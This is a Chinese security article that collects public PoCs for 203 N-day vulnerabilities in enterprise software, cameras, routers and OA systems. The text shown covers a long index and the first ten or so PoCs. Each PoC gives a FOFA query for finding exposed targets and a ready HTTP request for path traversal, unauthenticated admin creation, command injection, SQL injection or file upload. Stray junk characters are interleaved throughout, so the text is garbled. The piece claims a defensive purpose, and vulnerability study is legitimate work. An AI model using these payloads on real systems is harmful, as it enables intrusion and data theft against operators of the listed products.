互联网公开漏洞整理202309-202406
/ J2 c" T3 l1 I6 L2 Z/ F/ T道一安全 2024-06-05 07:41 北京
* H' b7 j7 i( u$ @# l以下文章来源于网络安全新视界 ,作者网络安全新视界# d' V; L! R5 j1 U6 g$ d: {
4 G/ K& I# P1 d! h: H
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。5 B( {, h' H1 T6 {8 @( [
) }' u6 e2 v: p9 a u# x/ P5 j
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
4 X5 n7 ]# o% I9 [
" o& K6 A/ V7 t9 L) W安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
" f5 L- E+ l3 T( v/ `- i, O& q! h5 r$ k
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
, p# k! \- W/ |9 ~. p& B1 F4 S' \2 v2 s# G) ]( N/ ?
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。, d" k- W0 O: b P9 i! H
8 Q' b8 t& @3 l- b/ V g
7 q4 }) K8 R1 n% V声明) _8 |, {2 w+ n
4 j. T* W5 a$ E为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
8 C& D3 ]5 z# q! v( |
6 M; Q* T9 P/ `有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
, b9 s) h2 e* d+ u& b' D1 T
( P4 L: A& a, l9 [
; I! M/ G0 o3 z
6 @; c% J% r3 |) V: b# X' ^目录
; z' [: ]" a0 H- ?: I1 k: q0 F d5 `% Q* }# K# A9 r
01* w/ o( D& |0 l2 @4 V! j5 J! {
( _8 W$ j1 b0 A1 N) N1. StarRocks MPP数据库未授权访问/ D; _+ A2 K7 L$ r# }
2. Casdoor系统static任意文件读取6 R+ O/ J* E I, x% [0 J
3. EasyCVR智能边缘网关 userlist 信息泄漏0 U! F; O6 d# @% n
4. EasyCVR视频管理平台存在任意用户添加
* Y. A1 c: F t R5. NUUO NVR 视频存储管理设备远程命令执行
5 b6 g1 M8 ^# \4 c9 z% M# q c& ?' Q6. 深信服 NGAF 任意文件读取
: c) [: u" _( O) F) X7. 鸿运主动安全监控云平台任意文件下载" c. {) j. U0 ^& L. s6 W
8. 斐讯 Phicomm 路由器RCE
2 m! ^9 _7 q! _+ R9. 稻壳CMS keyword 未授权SQL注入8 O0 Q6 b% i E- s
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
# j& o) B, T3 J, \11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
3 J) C: j3 ]. o& K3 n, v( N12. Jorani < 1.0.2 远程命令执行
- o# c# M; o* g8 u4 f2 d/ }+ _( E13. 红帆iOffice ioFileDown任意文件读取
* ]. G1 x; V6 x& u# \14. 华夏ERP(jshERP)敏感信息泄露
9 M8 I( X- _' h15. 华夏ERP getAllList信息泄露+ i1 d# b' B% P
16. 红帆HFOffice医微云SQL注入
6 X; Y0 {1 p5 i1 _- ~, N+ I17. 大华 DSS itcBulletin SQL 注入
% g J% ~1 B5 [1 M18. 大华 DSS 数字监控系统 user_edit.action 信息泄露 p4 r! J) }) _, D5 ~/ F
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入( i: T: z! K. ?$ L& Q9 K) g
20. 大华ICC智能物联综合管理平台任意文件读取 s) g/ K- r# Q, s
21. 大华ICC智能物联综合管理平台random远程代码执行$ Z5 D3 d$ u8 h" t3 p/ U$ M" f
22. 大华ICC智能物联综合管理平台 log4j远程代码执行+ X8 E/ j, ?$ ?7 e
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
( q$ @7 a D! F3 `) T% A( F& Q24. 用友NC 6.5 accept.jsp任意文件上传2 M1 {$ V: @9 e; Q/ D/ V3 R& b+ k9 T
25. 用友NC registerServlet JNDI 远程代码执行# x# J6 w7 h8 f7 I e9 U+ p
26. 用友NC linkVoucher SQL注入8 q6 s8 D: M |
27. 用友 NC showcontent SQL注入, F+ e. M7 A: h! M. F$ z
28. 用友NC grouptemplet 任意文件上传
5 A. f! R; E5 g- C6 S4 l29. 用友NC down/bill SQL注入9 |, N. H+ ~/ v) j: e
30. 用友NC importPml SQL注入
! q& _" v d9 V31. 用友NC runStateServlet SQL注入1 Z# P5 W. {; c- D( L8 D
32. 用友NC complainbilldetail SQL注入# X( j- H1 i( s
33. 用友NC downTax/download SQL注入
( Q7 N) a( m) @$ ]% E+ O1 w34. 用友NC warningDetailInfo接口SQL注入2 |. W2 |: d3 \2 j! q5 t
35. 用友NC-Cloud importhttpscer任意文件上传
. \& J) A2 c5 U+ y) c0 x+ F36. 用友NC-Cloud soapFormat XXE; v: R3 N A# o. |) Y% u
37. 用友NC-Cloud IUpdateService XXE+ n, W$ r+ Q: x( G# X' j
38. 用友U8 Cloud smartweb2.RPC.d XXE
" J; H6 m+ P+ L F# R% ~39. 用友U8 Cloud RegisterServlet SQL注入0 X# O7 n U$ a* _3 w9 q9 R/ Q
40. 用友U8-Cloud XChangeServlet XXE, G4 }4 V% p1 s6 U' b
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
6 C( ]0 B9 ~$ ]! [# B; u$ B( {42. 用友GRP-U8 SmartUpload01 文件上传* S J2 l" X2 W8 H
43. 用友GRP-U8 userInfoWeb SQL注入致RCE! m5 ]9 X. P6 e# e- k
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
) m2 j0 |' C6 }% d% v' t3 @45. 用友GRP-U8 ufgovbank XXE0 i+ |6 N$ o7 [7 y# ?3 }+ R( d
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
. r# S% ]9 I: z" g" J0 {47. 用友GRP A++Cloud 政府财务云 任意文件读取
7 s5 r; y$ D$ k8 u! |' `& R+ p48. 用友U8 CRM swfupload 任意文件上传* _' b8 V3 x! c) ~! U
49. 用友U8 CRM系统uploadfile.php接口任意文件上传9 d% `" ^2 J0 H( G
50. QDocs Smart School 6.4.1 filterRecords SQL注入
8 _% n, E: A& V51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
* f8 g, }; @9 L52. 泛微E-Office json_common.php sql注入 g0 n; F" v! N- D
53. 迪普 DPTech VPN Service 任意文件上传
, V0 r$ P7 B, o) b. M# ?54. 畅捷通T+ getstorewarehousebystore 远程代码执行" g5 s' {" j, P" I2 g' ]
55. 畅捷通T+ getdecallusers信息泄露
8 d8 e, ^" r v+ F/ `) ]/ x0 z56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
: x, X( _% R H) v57. 畅捷通T+ keyEdit.aspx SQL注入
" P! E4 u4 U7 Z0 c58. 畅捷通T+ KeyInfoList.aspx sql注入
+ b0 H2 d* h g* K3 d$ l; t, c$ v59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
- [( W) N3 `& ~4 r2 V$ z60. 百卓Smart管理平台 importexport.php SQL注入
/ u- R5 d- ^" f$ E& N& T; e61. 浙大恩特客户资源管理系统 fileupload 任意文件上传1 D% [' S6 ]" d) `* Y% z4 |# ?0 s+ d9 `" X
62. IP-guard WebServer 远程命令执行
1 f# M6 \/ \+ z6 u7 H2 u/ ?$ W63. IP-guard WebServer任意文件读取
* [% i6 l- B7 |64. 捷诚管理信息系统CWSFinanceCommon SQL注入
9 f! I3 e$ P6 b4 Q* k65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
0 F3 c; T& @! ~; a66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
5 W' U: [3 q S67. 万户ezOFFICE wpsservlet任意文件上传
6 |# z* S& v% s: P" |+ q8 K68. 万户ezOFFICE wf_printnum.jsp SQL注入
# j: ~8 O# m% T2 Z8 ?; {69. 万户 ezOFFICE contract_gd.jsp SQL注入 a: K9 R8 v& q% D* Y) j ]
70. 万户ezEIP success 命令执行, _1 K$ G9 E- f# R4 k) L8 k! q* U
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入0 D e( Q1 P3 j# Y0 ^$ E% a j
72. 致远OA getAjaxDataServlet XXE
8 l$ X! [: C) q/ D; G1 E. v/ |73. GeoServer wms远程代码执行6 K8 _/ R. N$ ]
74. 致远M3-server 6_1sp1 反序列化RCE) j q5 k- C9 T, F" A) t/ H
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
# l/ x% t, V9 _0 u1 T- \2 W; J1 R76. 新开普掌上校园服务管理平台service.action远程命令执行
1 f3 Q* k, R9 i( d1 g/ V77. F22服装管理软件系统UploadHandler.ashx任意文件上传5 r. F% P' i1 k1 _' o, o; y5 a
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
: h4 t" v: @* [ h79. BYTEVALUE 百为流控路由器远程命令执行0 m+ k) ?5 V, L- E- q; A
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传" X+ s& ~' X4 D. [$ O$ b; `
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
0 m6 c2 [. w4 z: b/ j82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
7 c9 Z2 o! i% u0 _83. JeecgBoot testConnection 远程命令执行0 _2 X& l" O" I; `& W3 C
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入8 D }# J2 N u/ A
85. SysAid On-premise< 23.3.36远程代码执行( z3 S/ P# E/ A
86. 日本tosei自助洗衣机RCE" I2 z* Z. u- ]! _# D
87. 安恒明御安全网关aaa_local_web_preview文件上传. Y6 X8 Q2 U* x! o" O2 R
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行; a. a# j6 X3 v6 H: l
89. 致远互联FE协作办公平台editflow_manager存在sql注入
. e2 r% a% ?) E/ D ]7 b90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行. t8 k$ u3 Y6 `
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取, V1 N( a- K/ p# L0 c* b
92. 海康威视运行管理中心session命令执行: b. j5 O; l, r
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传9 c1 L, j8 `. H4 c* ~3 \1 y# E
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传4 G( x2 ?2 V1 J! ]
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
' K D2 ?# n; u! T. b: Q96. Apache OFBiz 18.12.11 groovy 远程代码执行% d; c% a" S" N
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行, c! B: R! ^3 y/ B
98. SpiderFlow爬虫平台远程命令执行4 O9 M5 Z+ l) r
99. Ncast盈可视高清智能录播系统busiFacade RCE
. p9 S0 z" Y# D. B3 P100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
- `% w+ T7 o) Z. A" N! G( M101. ivanti policy secure-22.6命令注入
( C6 B# m/ F7 X$ h! i$ y6 `# S. U: w102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
5 ~. D, B0 u4 F9 y, u8 }103. Ivanti Pulse Connect Secure VPN XXE
/ ~5 c4 G& I# F6 c# N( ?; b, {& y104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
; g- ] v' e( n8 ^9 j+ [/ q" r7 ~/ ?% }* a105. SpringBlade v3.2.0 export-user SQL 注入
' a0 T# b3 @" C3 l% Y% O106. SpringBlade dict-biz/list SQL 注入2 x/ g8 Q4 e/ Z7 Z
107. SpringBlade tenant/list SQL 注入
! v$ i W# e9 L7 U0 x6 g108. D-Tale 3.9.0 SSRF
- y! _! I9 s* b109. Jenkins CLI 任意文件读取
' N' G: u4 ~& [ I' \- b110. Goanywhere MFT 未授权创建管理员
1 I' ?& X7 g" b: X9 c. a/ b111. WordPress Plugin HTML5 Video Player SQL注入
8 H. q& ~* S P* x- J/ c# V/ N112. WordPress Plugin NotificationX SQL 注入, I$ \0 S( H3 s3 a" T7 w
113. WordPress Automatic 插件任意文件下载和SSRF
# J5 L4 Z3 Q- L, Y/ R( z114. WordPress MasterStudy LMS插件 SQL注入
% v) r% ~6 J6 o115. WordPress Bricks Builder <= 1.9.6 RCE
2 e% c- B5 D8 P& S1 d116. wordpress js-support-ticket文件上传) m. l$ T7 t, }, g* ~$ `) C" g
117. WordPress LayerSlider插件SQL注入5 H0 q2 }. ^4 i8 i4 D8 E3 U6 v& R
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传5 G3 I) W" u9 X+ ^4 K
119. 北京百绰智能S20后台sysmanageajax.php sql注入4 D8 X' A8 V* U! t% _0 w. l
120. 北京百绰智能S40管理平台导入web.php任意文件上传
. t3 p0 M: l1 }5 a1 p121. 北京百绰智能S42管理平台userattestation.php任意文件上传
. {. F% f. ~1 ~/ t122. 北京百绰智能s200管理平台/importexport.php sql注入2 r" ^* t) O7 y' {$ ?
123. Atlassian Confluence 模板注入代码执行& E/ H m1 H8 j3 n; C& M
124. 湖南建研工程质量检测系统任意文件上传
! x; d( z2 q7 S8 ^ A2 R125. ConnectWise ScreenConnect身份验证绕过
$ M% u9 l( z6 a& l" K126. Aiohttp 路径遍历" S; A' K7 k3 {$ b: O6 o
127. 广联达Linkworks DataExchange.ashx XXE
0 @; i6 j$ A# u' `$ P' X, i128. Adobe ColdFusion 反序列化6 ]5 V! B3 z9 V* x% B# O. m' m; d) |
129. Adobe ColdFusion 任意文件读取
$ w# B5 o* C$ w$ p, I1 l6 e130. Laykefu客服系统任意文件上传# F! Y0 D; ]9 @( P' D
131. Mini-Tmall <=20231017 SQL注入
6 v: ]; C4 _' r% Y132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; W- j$ ~0 [5 d. h
133. H5 云商城 file.php 文件上传) a5 w I9 q# x" B
134. 网康NS-ASG应用安全网关index.php sql注入. |' t1 x+ b6 `# F M
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入8 Z" \) V4 e$ e3 l
136. NextChat cors SSRF
! Q6 F- J. t p: n# U* @" q' N137. 福建科立迅通信指挥调度平台down_file.php sql注入
4 ^/ y3 J6 v/ t% P1 ?- H/ X3 l138. 福建科立讯通信指挥调度平台pwd_update.php sql注入, y, {# N3 }7 s& R) }$ ~
139. 福建科立讯通信指挥调度平台editemedia.php sql注入' ^( k7 i7 p+ p1 w$ J1 H
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入% c9 P$ S* I( S
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入! f" I- l2 N1 u; E5 X
142. CMSV6车辆监控平台系统中存在弱密码
1 i' t$ H ^ L143. Netis WF2780 v2.1.40144 远程命令执行1 u3 m1 X) G- [4 A
144. D-Link nas_sharing.cgi 命令注入1 i+ B4 D- @% i: A% }- e' R9 P
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入/ p4 E2 i. j4 O2 b
146. MajorDoMo thumb.php 未授权远程代码执行
/ @6 _( i- l# Y4 T147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
5 A- s2 v0 d* t' T3 ?: P. d) L148. CrushFTP 认证绕过模板注入
( I; {$ X! A. _5 G- R0 }149. AJ-Report开源数据大屏存在远程命令执行
& Y: b' d0 h& R3 F+ Q1 u150. AJ-Report 1.4.0 认证绕过与远程代码执行& Q4 Y9 v- x4 K/ D6 D
151. AJ-Report 1.4.1 pageList sql注入
8 p) S8 }1 O. L$ C. `152. Progress Kemp LoadMaster 远程命令执行
5 R8 u' x0 ?% l3 p4 K+ g153. gradio任意文件读取
B. L3 S# J' m7 j154. 天维尔消防救援作战调度平台 SQL注入
+ D$ D- P7 {) z' Z155. 六零导航页 file.php 任意文件上传
# U8 G$ d& K- ^8 t; H. x; \156. TBK DVR-4104/DVR-4216 操作系统命令注入
% F w6 g. B h) Q$ u8 s m" \ n157. 美特CRM upload.jsp 任意文件上传
) y# A+ c6 `* G2 f# r158. Mura-CMS-processAsyncObject存在SQL注入( D$ V3 l3 d/ J9 ~% c3 J1 p
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
8 v3 Z9 L8 K' H2 c# Q/ q2 i160. Sonatype Nexus Repository 3目录遍历与文件读取
8 P/ X4 {/ a& D4 q) T% y! k161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
$ W- e8 S n! G# C162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传+ d: c9 X' Y* @" g; V2 [
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传 c6 r$ \- \" B- e8 A, w+ ^
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
1 c# y4 d: d* c5 @( i6 Z6 O165. OrangeHRM 3.3.3 SQL 注入9 ]8 d3 b3 E4 t" y; R* u b
166. 中成科信票务管理平台SeatMapHandler SQL注入
% }% K0 [2 f2 X/ z3 B0 x9 i167. 精益价值管理系统 DownLoad.aspx任意文件读取
6 x" Y" N+ E4 e- Y168. 宏景EHR OutputCode 任意文件读取
% g7 A" S; b" p4 k% m169. 宏景EHR downlawbase SQL注入
9 O' k$ O, S3 Y& M. B( I/ O8 [170. 宏景EHR DisplayExcelCustomReport 任意文件读取* ]# j# \8 p; S. C' Z4 T
171. 通天星CMSV6车载定位监控平台 SQL注入1 i$ K0 g2 e* b( O" k# V
172. DT-高清车牌识别摄像机任意文件读取
6 y7 z) F$ ?: N173. Check Point 安全网关任意文件读取
/ w! K( r2 W* p6 T- L( |174. 金和OA C6 FileDownLoad.aspx 任意文件读取
( \0 I* L; [7 C2 u6 ?) z+ T175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入( g3 z1 u7 j; s
176. 电信网关配置管理系统 rewrite.php 文件上传
- C3 P1 `% `7 T; F' w+ ]+ s4 B177. H3C路由器敏感信息泄露8 F; _# e: U# s0 d8 L' C7 S8 V
178. H3C校园网自助服务系统-flexfileupload-任意文件上传# ^+ `. l! J1 x( C
179. 建文工程管理系统存在任意文件读取
S* N' g3 r$ V, O! `180. 帮管客 CRM jiliyu SQL注入$ O4 N1 Q3 a4 p6 h$ j4 b3 w2 r- a
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
. K ]/ H' x3 ^0 t2 c182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建# b- S4 M: G5 B& \# H% E
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入4 c( a7 E% m6 Y
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加9 E4 C6 o3 F2 e5 K8 f
185. 瑞友天翼应用虚拟化系统SQL注入
6 `2 H8 O5 M j& V8 y- S186. F-logic DataCube3 SQL注入9 w9 X6 b5 o2 o! ?
187. Mura CMS processAsyncObject SQL注入% Y0 u# n# r1 t9 J8 @6 x' E
188. 叁体-佳会视频会议 attachment 任意文件读取
$ ~0 l7 `3 g, h/ a6 u189. 蓝网科技临床浏览系统 deleteStudy SQL注入8 s4 h, l" s9 A5 I* M
190. 短视频矩阵营销系统 poihuoqu 任意文件读取5 V: n d4 ^) F2 Z
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
' |, H( ^2 a: N' h( ^192. 富通天下外贸ERP UploadEmailAttr 任意文件上传5 k+ P" [+ j& g6 F, G9 F
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行: ]3 [8 t6 `$ C6 X! M: P
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传, N1 d# E7 Q( Q4 u7 R" j0 ~, r
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
0 O' l k# A. W$ j q196. 河南省风速科技统一认证平台密码重置
& h! n2 @7 p* i+ E2 ]197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
# F3 X" B3 u/ {* X% f198. 阿里云盘 WebDAV 命令注入! m8 I0 a. F' ^5 @! ~+ ^; S
199. cockpit系统assetsmanager_upload接口 文件上传
/ U$ C( ^- P. u8 A4 Z# L1 r% X! G200. SeaCMS海洋影视管理系统dmku SQL注入
! ?0 l! Z: {+ c4 [! o0 h! `201. 方正全媒体新闻采编系统 binary SQL注入" V; _# o* v% Z$ r. R
202. 微擎系统 AccountEdit任意文件上传
8 ~) \& ^" E9 u! }0 g9 T203. 红海云EHR PtFjk 文件上传& a$ x6 K3 Z- M
+ `9 c, H" K* F: s0 m3 V- k! sPOC列表5 ^, o5 \: Q7 X$ q
7 o/ u% c7 u% Z+ ?8 D- ^02$ V4 m: C3 f% c, x# ?3 x, U
! {+ }5 f& v1 y/ y
1. StarRocks MPP数据库未授权访问
; a; s6 J$ x$ Z( P% gFOFA :title="StarRocks"
0 X, R% s: ~7 w3 r+ _GET /mem_tracker HTTP/1.1. M4 S9 c4 N/ w% v3 Y' G
Host: URL& k5 v/ K+ R4 q
: ]- O6 j" P/ C* o' e
: ]- ^2 R) j, m) j! S) F" ^' o2. Casdoor系统static任意文件读取
2 G9 N9 r" ]* H5 lFOFA :title="Casdoor"
& q1 e6 u/ j- ~6 Q5 d5 N, oGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
- W/ r& y! s6 B( m" ~6 |" w1 k; XHost: xx.xx.xx.xx:9999
9 p: c# v( }1 A3 |3 N5 r' O+ pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; V1 |9 q- k7 d4 k/ F! Q7 I; KConnection: close
0 M0 N4 P0 V! o: B- d7 W- w* m2 XAccept: */*
' W8 F" v7 _7 i0 n: sAccept-Language: en9 H" O$ r& U4 r5 x! t/ ]5 @; [
Accept-Encoding: gzip
! h$ Q! z8 B4 }: `$ R3 m" {& }( T* X" Q9 H/ l5 a
0 w$ r& t& }7 Y3 m* f, c& u
3. EasyCVR智能边缘网关 userlist 信息泄漏
' t8 l0 ?1 b1 K0 g/ r0 ?FOFA :title="EasyCVR"
3 [4 F5 D/ O8 A6 |' L0 GGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.16 u0 P6 k6 D7 d5 v
Host: xx.xx.xx.xx
( ^. V2 f' ]$ U; k4 b" Q3 d: s' y; ~& Z% E( X+ {. }# N
$ x- [. D0 R4 X* f7 m' `# ]5 f
4. EasyCVR视频管理平台存在任意用户添加
: u. ~1 ]& V! A5 E# ZFOFA :title="EasyCVR"1 j% O# _" J O+ o; t7 Q
( J* a7 f. ?* @password更改为自己的密码md5
. f& S9 s- |5 r1 G$ K3 ZPOST /api/v1/adduser HTTP/1.1- G1 k9 W, H, ?2 P
Host: your-ip
) \' V7 O# X5 _# S! \Content-Type: application/x-www-form-urlencoded; charset=UTF-8+ j9 M6 x# c# e' `9 |0 u2 Y
' X$ P8 w r' Q- b, X- vname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
. I4 ]6 M0 T, \0 t: x7 J5 i W* y+ v4 q; M1 k" J* E2 @* I
5 i! O6 l- \5 V+ G9 `# h9 S5. NUUO NVR 视频存储管理设备远程命令执行
9 o# _! G& Q: o: L3 h( vFOFA:title="Network Video Recorder Login") _6 c) j Q8 g. k6 X# d I
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
! e) v9 p( J4 C' JHost: xx.xx.xx.xx; C7 o: F/ a! w3 O- L" G
% }* N+ S/ [$ N8 O f, g/ u9 x
0 Q( Q f4 k9 z) w4 _6. 深信服 NGAF 任意文件读取
% C1 Y, ]& I! H# ~/ _$ X" g: FFOFA:title="SANGFOR | NGAF"
+ T' K) ~4 ~8 ]GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.14 }( }9 T' a7 ?% k! d& m( l% m
Host:* w1 ^* L- [* ~' H) z
/ E* q2 w9 L1 R. t' A
9 i$ a* M- v, t7. 鸿运主动安全监控云平台任意文件下载- C! j! U7 m6 @/ l C6 b+ p4 R
FOFA:body="./open/webApi.html"7 C3 h5 e% F( s- _0 i
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
0 D' k I" o) U V8 m% qHost:* C* X6 L+ i7 C c4 A# c
' Q# x) r( B8 q: E
+ A/ {$ v+ J9 `0 }# Z4 e/ M
8. 斐讯 Phicomm 路由器RCE
; Y! A% u/ \+ k, \; yFOFA:icon_hash="-1344736688"
( k9 E1 K: e! E默认账号admin登录后台后,执行操作& N% |" H3 d7 k" s
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
* f& u# J; c6 C1 R& Q( f; DHost: x.x.x.x
; m- G/ A6 Z2 n! @: z0 \Cookie: sysauth=第一步登录获取的cookie; ~# Z" j. i0 y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz$ Y; q% y& i6 f3 `. J& p2 m
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
# P3 K4 X3 L1 W6 N# x: F" y+ m' K/ v' h4 ^+ q9 m0 j
------WebKitFormBoundaryxbgjoytz2 m9 S7 i7 T% {9 F3 V4 q
Content-Disposition: form-data; name="wifiRebootEnablestatus"
# q: m. [0 h8 G- w4 a
( A3 v( {# T( [' r; l5 r' B; w%s4 P H( A5 M S% w& s6 ?8 X( ?, r
------WebKitFormBoundaryxbgjoytz
- ]! o4 \8 _/ n! z0 V0 kContent-Disposition: form-data; name="wifiRebootrange"3 P# I2 U$ Q# I' M/ L1 d9 u
1 X; d+ C0 A8 j3 } |+ o12:00; id;
( B' I- g" H, L------WebKitFormBoundaryxbgjoytz
- e8 ]; T7 N8 c cContent-Disposition: form-data; name="wifiRebootendrange"$ [% E0 a) W7 y
/ y1 r: Y l, b4 d' X+ X%s:
9 O- c! S* _! \$ G% h0 [; m! N! G------WebKitFormBoundaryxbgjoytz' j8 I& H+ Q4 i9 h; V
Content-Disposition: form-data; name="cururl2"3 R) f; I/ u: S A
1 |4 W; }9 l$ Z) {
, `- [ y2 ]( u- a* D% P2 c
------WebKitFormBoundaryxbgjoytz--
) F: @* T& K+ `# v8 `' o
5 X- J- J, e7 V, v$ H
M( N. z& Q1 ]% j6 d9. 稻壳CMS keyword 未授权SQL注入
- }0 P0 _/ T9 d1 Y, JFOFA:app="Doccms"
8 J2 w/ u1 j5 m7 t3 ?5 R9 L8 C+ j1 @GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
- H. Z; b" y( B! H4 u! h- fHost: x.x.x.x5 J1 o% y& ^! S; D/ }, |- s- z' Y
) L1 e- O6 k0 e4 |* z
9 p0 D- M$ f; L3 t# T" P8 zpayload为下列语句的二次Url编码
* d$ O# o* x2 d9 n: ~7 d3 ~1 d8 d. z% ], {: q( m% e6 `6 {, F+ _
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
' G) v1 F; Q% y8 Z8 u1 W8 M0 Q* _0 g' D4 c2 h
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传6 z. S6 }" w4 {8 `" P6 @
FOFA:icon_hash="953405444"+ n' g$ N* D8 z
1 P3 v' D1 F+ t- W
文件上传后响应中包含上传文件的路径6 E* G6 ?! V6 r/ T
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
; U" o. G! F4 T( w2 x6 X# PHost: x.x.x.x:xx
" f% }; o" y' \+ X t t7 s, s% WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.364 p9 ?! R( r$ X. c
Content-Length: 197
3 o. h6 U" A. S: L# Y5 [) hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' w# c4 E- ^# t8 G- cAccept-Encoding: gzip, deflate
4 P+ {4 S: z2 J! h8 U W1 h; b+ c, sAccept-Language: zh-CN,zh;q=0.93 F+ \& n ]5 e1 E& _
Connection: close
, o' C4 v! }! o% u+ E. A/ WContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
" G/ s$ M5 ]. R- g9 \2 o( b% O( L* B
------WebKitFormBoundaryxdgaqmqu; L/ G4 p |: n. {, i9 V
Content-Disposition: form-data; name="file"filename="icfitnya.txt"; k4 p& j" x h" y8 }/ K }3 G; a6 z
Content-Type: text/html
) w C9 L/ N3 c! U- b. f
4 _, h$ e! L' |' `4 xjmnqjfdsupxgfidopeixbgsxbf. e! c% Q* t: M$ R, ?3 ~2 J5 d
------WebKitFormBoundaryxdgaqmqu--; y! B+ R/ N6 z# {& ?8 B, D
, b/ s, m2 Q6 z
. F- @! R V: w) J11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入2 d8 _6 D3 h4 V! h4 }$ o% d
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
